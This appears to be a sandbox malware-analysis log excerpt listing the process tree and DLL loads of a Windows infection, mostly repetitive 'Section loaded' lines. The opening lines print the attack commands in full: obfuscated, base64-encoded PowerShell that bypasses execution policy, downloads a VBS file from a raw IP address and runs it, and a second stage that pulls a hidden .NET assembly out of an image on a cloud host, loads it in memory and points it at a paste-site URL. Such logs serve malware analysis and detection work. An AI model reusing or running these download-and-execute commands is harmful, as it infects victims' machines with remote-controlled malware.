Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES254C.tmp" "c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel

Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
